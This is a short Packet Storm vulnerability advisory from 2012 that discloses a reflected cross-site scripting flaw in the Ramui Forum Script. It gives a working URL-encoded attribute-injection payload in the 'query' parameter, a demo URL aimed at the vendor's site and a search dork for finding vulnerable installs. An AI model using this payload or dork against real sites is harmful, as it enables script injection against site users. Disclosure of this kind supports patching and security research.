Ramui Forum Script Cross Site Scripting

2012-05-07T00:00:00
ID PACKETSTORM:112495
Type packetstorm
Reporter 3spi0n
Modified 2012-05-07T00:00:00

Description

                                        
                                            `# Exploit Title; Ramui Forum Script Cross Site Scripting Vulnerability [pixlie.php]  
# Date ; 7/5/12  
# Author ; 3spi0n  
# Script Vendor or Software Link ; www.ramui.com - www.hotscripts.com/listing/ramui-forum-script/  
# Category ; Webapps  
# Type ; Cross Site Scripting (XSS)  
# Tested on ; Ubuntu / Win7 / Backtrack  
  
[#] Script Details ;  
  
- Demo ; forumscript.ramui.com  
  
[#] Demo Analyzing ;  
  
http://forumscript.ramui.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22  
  
[#] Vulnerable Details ;  
  
- Xss Vulnerable on sites  
  
- Vulnerable File ; index.php?query= [query, variant of index.php file]  
  
Exploit ;  
/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22  
  
[#] Dorks ;  
  
- "Powered by: Ramui forum script"  
  
  
[#] Greetz ;  
  
- X-BL4CKERZ INC.  
- My Official Blog, www.Ryuzaki.in  
- Facebook.Com/3spi0ne - Twitter.Com/RigidusCO  
`